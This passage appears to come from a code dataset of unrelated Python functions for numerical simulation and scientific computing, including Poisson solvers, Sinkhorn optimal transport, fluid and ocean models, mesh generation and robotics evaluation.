self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 
1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def potentialSolver3(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n 
self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def body_fn(iteration, const, state, compute_error):\n geom, a, b, _ = const\n errors, f_u, g_v = state\n\n # compute momentum term if needed, using previously seen errors.\n w = jax.lax.stop_gradient(jnp.where(iteration >= (\n inner_iterations * chg_momentum_from + min_iterations),\n get_momentum(errors, chg_momentum_from),\n momentum_default))\n\n # sinkhorn updates using momentum, in either scaling or potential form.\n if lse_mode:\n new_g_v = tau_b * geom.update_potential(f_u, g_v, jnp.log(b),\n iteration, axis=0)\n g_v = (1.0 - w) * jnp.where(jnp.isfinite(g_v), g_v, 0.0) + w * new_g_v\n\n new_f_u = tau_a * geom.update_potential(f_u, g_v, jnp.log(a),\n iteration, axis=1)\n f_u = (1.0 - w) * jnp.where(jnp.isfinite(f_u), f_u, 0.0) + w * new_f_u\n else:\n new_g_v = geom.update_scaling(f_u, b, iteration, axis=0) ** tau_b\n g_v = jnp.where(g_v > 0, g_v, 1) ** (1.0 - w) * new_g_v ** w\n\n new_f_u = geom.update_scaling(g_v, a, iteration, axis=1) ** tau_a\n f_u = jnp.where(f_u > 0, f_u, 1) ** (1.0 - w) * new_f_u ** w\n\n # re-computes error if compute_error is True, else set it to inf.\n err = jnp.where(\n jnp.logical_and(compute_error, iteration >= min_iterations),\n marginal_error(geom, a, b, tau_a, tau_b, f_u, g_v, norm_error,\n lse_mode),\n jnp.inf)\n\n errors = jax.ops.index_update(\n errors, jax.ops.index[iteration // inner_iterations, :], err)\n return errors, f_u, g_v", "def test_velocity_boundaries(self):\n L_x = self.x_edge[-1]\n np.testing.assert_array_almost_equal(self.v_box(self.t, 0), 0, decimal=4)\n np.testing.assert_array_almost_equal(self.v_box(self.t, L_x), 0, decimal=4)", "def _sinkhorn_iterations_implicit_bwd(\n tau_a, tau_b, inner_iterations, min_iterations, max_iterations,\n momentum_default, chg_momentum_from, lse_mode, 
implicit_differentiation,\n res, gr) -> Tuple[Any, Any, geometry.Geometry, jnp.ndarray, jnp.ndarray]:\n del inner_iterations, min_iterations, max_iterations, momentum_default\n del chg_momentum_from, implicit_differentiation\n f, g, geom, a, b = res\n f_g = jnp.concatenate((f, g))\n # Ignores gradients info with respect to 'errors' output.\n gr = gr[0], gr[1]\n ridge = 1e-10 # to regularize the linear system in implicit function diff\n\n if lse_mode:\n marginal_a = lambda geom, f, g: geom.marginal_from_potentials(f, g, 1)\n marginal_b = lambda geom, f, g: geom.marginal_from_potentials(f, g, 0)\n else:\n marginal_a = lambda geom, f, g: geom.marginal_from_scalings(\n geom.scaling_from_potential(f), geom.scaling_from_potential(g), 1)\n\n marginal_b = lambda geom, f, g: geom.marginal_from_scalings(\n geom.scaling_from_potential(f), geom.scaling_from_potential(g), 0)\n\n n, _ = geom.shape\n\n def first_order_conditions(geom: geometry.Geometry,\n a: jnp.ndarray,\n b: jnp.ndarray,\n fg: jnp.ndarray):\n \"\"\"Computes vector of first order conditions for the reg-OT problem.\n\n The output of this vector should be close to zero at optimality.\n Upon completion of the Sinkhorn forward pass, its norm (as computed using\n the norm_error setting) should be below the threshold parameter.\n\n This error will be itself assumed to be close to zero when using implicit\n differentiation.\n\n Args:\n geom: a geometry object\n a: jnp.ndarray, first marginal\n b: jnp.ndarray, second marginal\n fg: concatenated vector of two potentials (total size equals the sum of\n that of a and b)\n Returns:\n a jnp.ndarray of the size of fg quantifying deviation from optimality.\n \"\"\"\n grad_a, grad_b = grad_of_marginal_fit(\n a, b, fg[:n], fg[n:], tau_a, tau_b, geom)\n return jnp.concatenate((\n jnp.where(a > 0,\n marginal_a(geom, fg[:n], fg[n:]) - grad_a,\n 0.0),\n jnp.where(b > 0,\n marginal_b(geom, fg[:n], fg[n:]) - grad_b,\n 0.0)\n ))\n\n foc_fg = lambda fg: first_order_conditions(geom, a, b, fg)\n foc_geom_a_b = lambda geom, a, b: first_order_conditions(geom, a, b, f_g)\n\n # Carries out implicit differentiation of F.O.C. 
using inversion of VJP\n # computed here using automatic differentiation of the F.O.C vector.\n _, pull_fg = jax.vjp(foc_fg, jnp.where(jnp.isfinite(f_g), f_g, 0))\n # Adds a small regularizer to improve conditioning when solving linear system\n pull_fg_0 = lambda vec: pull_fg(vec)[0] + ridge * jnp.sum(vec**2)\n vjp_gr = -jax.scipy.sparse.linalg.cg(pull_fg_0, jnp.concatenate(gr))[0]\n # Carries pullback onto original inputs, here geom, a and b.\n _, pull_geom_a_b = jax.vjp(foc_geom_a_b, geom, a, b)\n g_geom, g_a, g_b = pull_geom_a_b(vjp_gr)\n # First gradient are for threshold and norm_errors: we set them to None\n return None, None, g_geom, g_a, g_b", "def basiscond(self):\n nrmbasis_ = ctypes.c_double()\n nrminvbasis_ = ctypes.c_double()\n res = __library__.MSK_XX_basiscond(self.__nativep,ctypes.byref(nrmbasis_),ctypes.byref(nrminvbasis_))\n if res != 0:\n _,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n nrmbasis_ = nrmbasis_.value\n _nrmbasis_return_value = nrmbasis_\n nrminvbasis_ = nrminvbasis_.value\n _nrminvbasis_return_value = nrminvbasis_\n return (_nrmbasis_return_value,_nrminvbasis_return_value)", "def box_collision_info(self):\r\n position = np.zeros((self.Npart,3)) # antall part, dim, iterasjoner\r\n position[:,:] = np.random.uniform(0,1e-6, size = (self.Npart,3))\r\n velocity = np.zeros((self.Npart,3))\r\n velocity[:,:] = np.random.normal(0,self.sigma,size = (self.Npart,3))\r\n\r\n part_collided = 0\r\n part_escaped = 0\r\n momentum = 0\r\n\r\n print 'engine started'\r\n for i in xrange(1,self.n):\r\n #collision\r\n position += velocity*dt\r\n l_hole = position[:,0:2] > self.L/4\r\n h_hole = position[:,0:2] < (3*self.L)/4\r\n pos_xy = np.logical_and(l_hole, h_hole)\r\n pos_xy = np.logical_and(pos_xy[:,0], pos_xy[:,1])\r\n pos_z = position[:,2] < 0\r\n esc_part = np.logical_and(pos_z, pos_xy)\r\n\r\n #velocity[esc_part] = velocity[esc_part]\r\n part_escaped += np.sum(esc_part)\r\n\r\n for j in xrange(0,3):\r\n impact_wall_pos = np.logical_and(position[:,j] > 0,\r\n position[:,j] < self.L)\r\n velocity[np.logical_not(impact_wall_pos),j] = -velocity[\r\n np.logical_not(impact_wall_pos),j]\r\n\r\n\r\n if j == 0:\r\n part_collided += np.sum(np.logical_not(impact_wall_pos),j)\r\n momentum += np.sum(2*self.m*abs(velocity[np.logical_not(\r\n impact_wall_pos),j]))\r\n\r\n\r\n\r\n position[position < 0] = 0\r\n position[position >self.L] = self.L\r\n\r\n particle_collided = part_collided/2\r\n return position, velocity,part_escaped, impact_wall_pos, particle_collided, momentum", "def get_bforce_wm_ws_Gx_surf(self):\n\n [Ly,N] = self.b.shape\n z_u_w = self.grid_dict['z_u_w'] \n \n self.Gm1 = np.zeros([Ly])\n self.dGm1_dS = np.zeros([Ly]) \n self.Gt1 = np.zeros([Ly])\n self.dGt1_dS = np.zeros([Ly]) \n self.Bfsfc_bl = np.zeros([Ly])\n self.Av_bl = np.zeros([Ly])\n self.dAv_bl = np.zeros([Ly])\n \n #debugging\n self.wm_surf = np.zeros([Ly])\n self.ws_surf = np.zeros([Ly]) \n\n #---> j-loop\n for j in range(Ly): \n k_w = self.kbl[j] # KBL is \"new bl index after calling find_new_kbl()\n z_bl = z_u_w[j,N] - self.hbls[j]\n zscale = self.hbls[j] \n \n if self.swr_frac[j,k_w-1] > 0:\n Bfsfc = self.Bo[j] + self.Bosol[j] * ( 1. 
- self.swr_frac[j,k_w-1]\\\n * self.swr_frac[j,k_w] * ( z_u_w[j,k_w] - z_u_w[j,k_w-1] )\\\n / (self.swr_frac[j,k_w] * (z_u_w[j,k_w] - z_bl)\\\n + self.swr_frac[j,k_w-1] * (z_bl - z_u_w[j,k_w-1]) ))\n \n else:\n Bfsfc = self.Bo[j] + self.Bosol[j]\n \n # CALCUALTE TURBULENT VELOCITY SCALES\n wm,ws = self.lmd_wscale_wm_and_ws(Bfsfc,zscale,self.ustar[j],self.hbls[j])\n self.wm_surf[j] = wm\n self.ws_surf[j] = ws \n\n if self.LIMIT_UNSTABLE_ONLY:\n f1 = 5. * np.max([0,Bfsfc]) * self.vonKar / (self.ustar[j]**4+self.eps)\n else:\n f1 = 0\n\n \n cff = 1. / (z_u_w[j,k_w] - z_u_w[j,k_w-1])\n cff_up = cff * (z_bl - z_u_w[j,k_w])\n cff_dn = cff * (z_u_w[j,k_w] - z_bl)\n\n #MOMENTUM \n Av_bl = cff_up * self.Kv_old[j,k_w] + cff_dn * self.Kv_old[j,k_w-1]\n dAv_bl = cff * (self.Kv_old[j,k_w] - self.Kv_old[j,k_w-1])\n self.Av_bl[j] = Av_bl\n self.dAv_bl[j] = dAv_bl\n self.Gm1[j] = Av_bl / (self.hbls[j] * wm + self.eps)\n self.dGm1_dS[j] = np.min([0.,Av_bl*f1-dAv_bl/(wm+self.eps)]) \n\n #TEMPERATURE(BUOYANCY)\n At_bl = cff_up * self.Kt_old[j,k_w] + cff_dn * self.Kt_old[j,k_w-1]\n dAt_bl = cff * (self.Kt_old[j,k_w] - self.Kt_old[j,k_w-1])\n self.Gt1[j] = At_bl / (self.hbls[j] * ws + self.eps)\n self.dGt1_dS[j] = np.min([0.,At_bl*f1-dAt_bl/(ws+self.eps)]) \n\n self.Bfsfc_bl[j] = Bfsfc", "def build_rhs():\n\n def div(\n coeff_rho,\n momentum_x,\n momentum_y,\n momentum_z,\n ):\n \"\"\"Computes the divergence of the velocity field.\"\"\"\n # Compute the fourth order derivative of the pressure for the face\n # velocity correction.\n p_corr = (\n states['p']\n if self._params.enable_rhie_chow_correction else states['dp'])\n d4p_dx4 = self._kernel_op.apply_kernel_op_x(p_corr, 'k4d2x')\n d4p_dy4 = self._kernel_op.apply_kernel_op_y(p_corr, 'k4d2y')\n d4p_dz4 = self._kernel_op.apply_kernel_op_z(p_corr, 'k4d2z',\n 'k4d2zsh')\n\n # Compute velocity gradient based on interpolated values on cell faces.\n coeff_x = dt / (4. * coeff_rho * dx**2)\n du = self._kernel_op.apply_kernel_op_x(momentum_x, 'kDx')\n du_dx = [\n du_i / (2. * dx) + coeff_x * d4p_dx4_i\n for du_i, d4p_dx4_i in zip(du, d4p_dx4)\n ]\n\n coeff_y = dt / (4. * coeff_rho * dy**2)\n dv = self._kernel_op.apply_kernel_op_y(momentum_y, 'kDy')\n dv_dy = [\n dv_i / (2. * dy) + coeff_y * d4p_dy4_i\n for dv_i, d4p_dy4_i in zip(dv, d4p_dy4)\n ]\n\n coeff_z = dt / (4. * coeff_rho * dz**2)\n dw = self._kernel_op.apply_kernel_op_z(momentum_z, 'kDz', 'kDzsh')\n dw_dz = [\n dw_i / (2. 
* dz) + coeff_z * d4p_dz4_i\n for dw_i, d4p_dz4_i in zip(dw, d4p_dz4)\n ]\n\n return [\n du_dx_i + dv_dy_i + dw_dz_i\n for du_dx_i, dv_dy_i, dw_dz_i in zip(du_dx, dv_dy, dw_dz)\n ]\n\n def add_factor(\n v,\n factor,\n ):\n return [factor * v_i for v_i in v]\n\n b_terms = {\n _B_TERM_SOURCE_RHO: add_factor(src_rho, inv_dt),\n }\n if isinstance(rho_info, ConstantDensityInfo):\n b_terms.update({\n _B_TERM_DIV:\n add_factor(\n div(rho_info.rho, states['u'], states['v'], states['w']),\n inv_dt * rho_info.rho),\n _B_TERM_DRHO_DT: [\n tf.zeros_like(src_rho_i) for src_rho_i in src_rho\n ],\n })\n\n elif isinstance(rho_info, VariableDensityInfo):\n b_terms.update({\n _B_TERM_DIV:\n add_factor(\n div(1.0, states['rho_u'], states['rho_v'], states['rho_w']),\n inv_dt),\n _B_TERM_DRHO_DT:\n add_factor(rho_info.drho_dt, inv_dt),\n })\n\n else:\n raise ValueError('`rho_info` has to be either `ConstantDensityInfo` or '\n '`VariableDensityInfo`.')\n\n # pylint: disable=g-complex-comprehension\n return [(div_i + drho_dt_i - src_rho_i)\n for div_i, drho_dt_i, src_rho_i in zip(\n b_terms[_B_TERM_DIV],\n b_terms[_B_TERM_DRHO_DT],\n b_terms[_B_TERM_SOURCE_RHO],\n )], b_terms\n # pylint: enable=g-complex-comprehension", "def single_eval_boundary(fg_boundary, gt_boundary, bound_pix=0):\n assert np.atleast_3d(fg_boundary).shape[2] == 1\n\n from skimage.morphology import binary_dilation, disk\n\n fg_dil = binary_dilation(fg_boundary, disk(bound_pix))\n gt_dil = binary_dilation(gt_boundary, disk(bound_pix))\n\n # Get the intersection\n gt_match = gt_boundary * fg_dil\n fg_match = fg_boundary * gt_dil\n\n # Area of the intersection\n n_fg = np.sum(fg_boundary)\n n_gt = np.sum(gt_boundary)\n\n # % Compute precision and recall\n if n_fg == 0 and n_gt > 0:\n precision = 1\n recall = 0\n elif n_fg > 0 and n_gt == 0:\n precision = 0\n recall = 1\n elif n_fg == 0 and n_gt == 0:\n precision = 1\n recall = 1\n else:\n precision = np.sum(fg_match) / float(n_fg)\n recall = np.sum(gt_match) / float(n_gt)\n\n # Compute F meas\n # ure\n if precision + recall == 0:\n F = 0\n else:\n F = 2 * precision * recall / (precision + recall)\n\n return F, precision, recall", "def run(self, **kwargs):\r\n\r\n # Get the kwargs.\r\n cases = kwargs['case']\r\n if cases == 'all':\r\n cases = scr.pfile.case.keys()\r\n elif type(cases) is not list:\r\n cases = [cases]\r\n if 'rbm' in kwargs.keys():\r\n if kwargs['rbm'].lower() == 'yes':\r\n rbm = 1\r\n else:\r\n rbm = 0\r\n else:\r\n rbm = 0\r\n\r\n # Run all the requested cases.\r\n for c in cases:\r\n # Create the current case dictionary key.\r\n if c not in self.time.keys():\r\n self.time[c] = []\r\n if c not in self.u.keys():\r\n self.u[c] = []\r\n if c not in self.eta.keys():\r\n self.eta[c] = []\r\n\r\n # Determine the modal force vector.\r\n p_modal = modal_p(self.pfile.case[c], self.phi)\r\n\r\n # Determine the time parameters in the forcing function.\r\n grid = self.pfile.case[c]['grids'][0]\r\n self.time[c] = self.pfile.case[c][grid][:, 0]\r\n dt = self.pfile.case[c]['dt']\r\n\r\n # Add 100 seconds at the end of the forcing function for ring down.\r\n add_time = [(20, 0.01), (80, 0.5)]\r\n for at in add_time:\r\n new_time = np.arange(self.time[c][-1] + dt, self.time[c][-1] + at[0], at[1])\r\n self.time[c] = np.append(self.time[c], new_time)\r\n new_p_modal = np.zeros([self.phi.num_modes, new_time.size])\r\n p_modal = np.append(p_modal, new_p_modal, axis=1)\r\n\r\n # Integrate the modal EOM using Reccurence Formulas:\r\n # etadd + 2 * zeta omn * etad + omn**2 * eta = P\r\n eta0 = 
np.zeros_like(p_modal)\r\n etad0 = np.zeros_like(p_modal)\r\n [self.eta[c], etad] = rf_mdof(self.time[c], p_modal, self.eig.eigenvalues,\r\n np.multiply(2 * np.pi, self.eig.frequency), self.zeta,\r\n eta0, etad0)\r\n\r\n # Remove rigid body modes unless requested not to.\r\n if rbm == 0:\r\n self.eta[c][0:6, :] = 0.0\r\n\r\n # Recover the desired responses with superposition of modes using the LTM\r\n self.u[c] = self.ltm.dtm @ self.eta[c]\r\n\r\n # Perform the required RSS set out in the HWLIST.\r\n self.rss(c)", "def rectangular_periodic(m_g, n_g, len1_g=1.0, len2_g=1.0, origin_g = (0.0, 0.0)):\n\n processor = 0\n numproc = 1\n\n\n n = n_g\n m_low = -1\n m_high = m_g +1\n\n m = m_high - m_low\n\n delta1 = float(len1_g)/m_g\n delta2 = float(len2_g)/n_g\n\n len1 = len1_g*float(m)/float(m_g)\n len2 = len2_g\n origin = ( origin_g[0]+float(m_low)/float(m_g)*len1_g, origin_g[1] )\n\n #Calculate number of points\n Np = (m+1)*(n+1)\n\n class VIndex(object):\n\n def __init__(self, n,m):\n self.n = n\n self.m = m\n\n def __call__(self, i,j):\n return j+i*(self.n+1)\n\n class EIndex(object):\n\n def __init__(self, n,m):\n self.n = n\n self.m = m\n\n def __call__(self, i,j):\n return 2*(j+i*self.n)\n\n\n I = VIndex(n,m)\n E = EIndex(n,m)\n\n points = num.zeros( (Np,2), float)\n\n for i in range(m+1):\n for j in range(n+1):\n\n points[I(i,j),:] = [i*delta1 + origin[0], j*delta2 + origin[1]]\n\n #Construct 2 triangles per rectangular element and assign tags to boundary\n #Calculate number of triangles\n Nt = 2*m*n\n\n\n elements = num.zeros( (Nt,3), int)\n boundary = {}\n Idgl = []\n Idfl = []\n Idgr = []\n Idfr = []\n\n full_send_dict = {}\n ghost_recv_dict = {}\n nt = -1\n for i in range(m):\n for j in range(n):\n\n i1 = I(i,j+1)\n i2 = I(i,j)\n i3 = I(i+1,j+1)\n i4 = I(i+1,j)\n\n #Lower Element\n nt = E(i,j)\n if i == 0:\n Idgl.append(nt)\n\n if i == 1:\n Idfl.append(nt)\n\n if i == m-2:\n Idfr.append(nt)\n\n if i == m-1:\n Idgr.append(nt)\n\n if i == m-1:\n if processor == numproc-1:\n boundary[nt, 2] = 'right'\n else:\n boundary[nt, 2] = 'ghost'\n\n if j == 0:\n boundary[nt, 1] = 'bottom'\n elements[nt,:] = [i4,i3,i2]\n\n #Upper Element\n nt = E(i,j)+1\n if i == 0:\n Idgl.append(nt)\n\n if i == 1:\n Idfl.append(nt)\n\n if i == m-2:\n Idfr.append(nt)\n\n if i == m-1:\n Idgr.append(nt)\n\n if i == 0:\n if processor == 0:\n boundary[nt, 2] = 'left'\n else:\n boundary[nt, 2] = 'ghost'\n if j == n-1:\n boundary[nt, 1] = 'top'\n elements[nt,:] = [i1,i2,i3]\n\n Idfl.extend(Idfr)\n Idgr.extend(Idgl)\n\n Idfl = num.array(Idfl, int)\n Idgr = num.array(Idgr, int)\n\n full_send_dict[processor] = [Idfl, Idfl]\n ghost_recv_dict[processor] = [Idgr, Idgr]\n\n\n return points, elements, boundary, full_send_dict, ghost_recv_dict", "def eval_damping():\n # Environment\n env = WAMBallInCupSim(num_dof=7, max_steps=1500)\n\n # Policy (random init)\n policy_hparam = dict(num_feat_per_dim=12, bounds=(np.array([0.0]), np.array([1.0])))\n policy = DualRBFLinearPolicy(env.spec, policy_hparam, dim_mask=2)\n\n # Do the rolllouts\n t_all = []\n qpos_all = []\n dp_vals = [0.0, 0.01, 0.1, 0.5, 1.0]\n print_cbt(f\"Run policy for damping coefficients: {dp_vals}\")\n for dpv in dp_vals:\n env.reset(\n domain_param=dict(\n joint_1_damping=dpv,\n joint_2_damping=dpv,\n joint_3_damping=dpv,\n joint_4_damping=dpv,\n joint_5_damping=dpv,\n joint_6_damping=dpv,\n joint_7_damping=dpv,\n )\n )\n ro = rollout(env, policy, render_mode=RenderMode(video=False), eval=True)\n t_all.append(ro.time[:-1])\n 
qpos_all.append(ro.env_infos[\"qpos\"])\n\n # Plot\n fig, ax = plt.subplots(nrows=env.num_dof, sharex=\"all\", figsize=(16, 7))\n for i, idx_joint in enumerate([dof for dof in range(env.num_dof)]):\n ax[i].set_prop_cycle(color=plt.get_cmap(\"cividis\")(np.linspace(0, 1, env.num_dof)))\n ax[i].set_ylabel(f\"joint {idx_joint+1} pos [rad]\")\n for j in range(len(dp_vals)):\n ax[i].plot(t_all[j], qpos_all[j][:, idx_joint], ls=\"--\", label=f\"d = {dp_vals[j]}\")\n if i == 0:\n ax[i].legend(ncol=len(dp_vals))\n ax[-1].set_xlabel(\"time [s]\")\n plt.suptitle(\"Evaluation of joint damping coefficients\")\n plt.show()", "def newton_method_bidirectional(f, bnd1, bnd2, Ep, step):\n\n while True:\n step = step + 1\n\n # print(\"bnd1=\",bnd1,\" and bnd2=\",bnd2)\n\n h_bnd1 = f(bnd1) / derivative(f, bnd1)\n bnd1 = bnd1 - h_bnd1\n if (decide(abs(h_bnd1) <= Ep)):\n # print(\"Root in Approximation: \",bnd1)\n return step\n\n h_bnd2 = f(bnd2) / derivative(f, bnd2)\n bnd2 = bnd2 - h_bnd2\n if (decide(abs(h_bnd2) <= Ep)):\n # print(\"Root in Approximation: \",bnd2)\n return step", "def compute_refl(self, step, borders,obstacle):\n\n r = self.radius\n v = self.velocity\n x = self.position\n projx = step*abs(np.dot(v,np.array([1.,0.])))\n projy = step*abs(np.dot(v,np.array([0.,1.])))\n\n a = pygame.Rect(0,0,borders[3][0],borders[3][0])\n b = pygame.Rect(0,borders[0][1]+borders[0][3],borders[3][0],borders[3][1]+borders[3][3])\n c = pygame.Rect(borders[2][0]+borders[2][2],0,borders[3][0],borders[3][0])\n d = pygame.Rect(borders[3][0]+borders[3][2],borders[1][1]+borders[1][3],borders[3][0],borders[3][0])\n\n if(a.collidepoint(*self.position) or b.collidepoint(*self.position) or c.collidepoint(*self.position) or d.collidepoint(*self.position)):\n self.vafter *= 0\n self.delete = True\n\n\n\n\n else:\n if (abs(x[0])-r -borders[0][0]-borders[0][2] < projx ) or (abs(borders[1][0]- x[0])-r < projx):\n self.vafter[0] *= -1\n\n if abs(x[1])-r -(borders[2][1]+borders[2][3]) < projy or abs(borders[3][1]-x[1])-r < projy:\n self.vafter[1] *= -1.\n\n if obstacle != None:\n obs = pygame.Rect(*obstacle)\n if obs.collidepoint(x[0] + r,x[1]):\n self.vafter[0] = -20\n if obs.collidepoint(x[0] - r,x[1]):\n self.vafter[0] = 20\n if obs.collidepoint(x[0],x[1]- r):\n self.vafter[1] = 20\n if obs.collidepoint(x[0], x[1]+ r):\n self.vafter[1] = -20", "def assemble_matrices(self):\n \n #Pointer reassignment for convenience\n N = self.ngrids\n\n #Begin with a linked-list data structure for the transmissibilities,\n #and one-dimenstional arrays for the diagonal of B and the flux vector\n T = lil_matrix((N, N), dtype=np.double)\n B = np.zeros(N, dtype=np.double)\n Q = np.zeros(N, dtype=np.double)\n\n #Read in boundary condition types and values\n bcs = self.input_data['boundary conditions']\n bc_type_1 = bcs['left']['type'].lower()\n bc_type_2 = bcs['right']['type'].lower()\n bc_value_1 = bcs['left']['value']\n bc_value_2 = bcs['right']['value']\n \n #Loop over all grid cells\n for i in range(N):\n\n #Apply left BC\n if i == 0:\n T[i, i+1] = -self.compute_transmissibility(i, i + 1)\n\n if bc_type_1 == 'neumann':\n T[i, i] = T[i,i] - T[i, i+1]\n elif bc_type_1 == 'dirichlet':\n #Computes the transmissibility of the ith block\n T0 = self.compute_transmissibility(i, i)\n T[i, i] = T[i,i] - T[i, i+1] + 2.0 * T0\n Q[i] = 2.0 * T0 * bc_value_1\n else:\n pass #TODO: Add error checking here if no bc is specified\n\n #Apply right BC\n elif i == (N - 1):\n T[i, i-1] = -self.compute_transmissibility(i, i - 1)\n\n if bc_type_2 == 'neumann':\n T[i, i] 
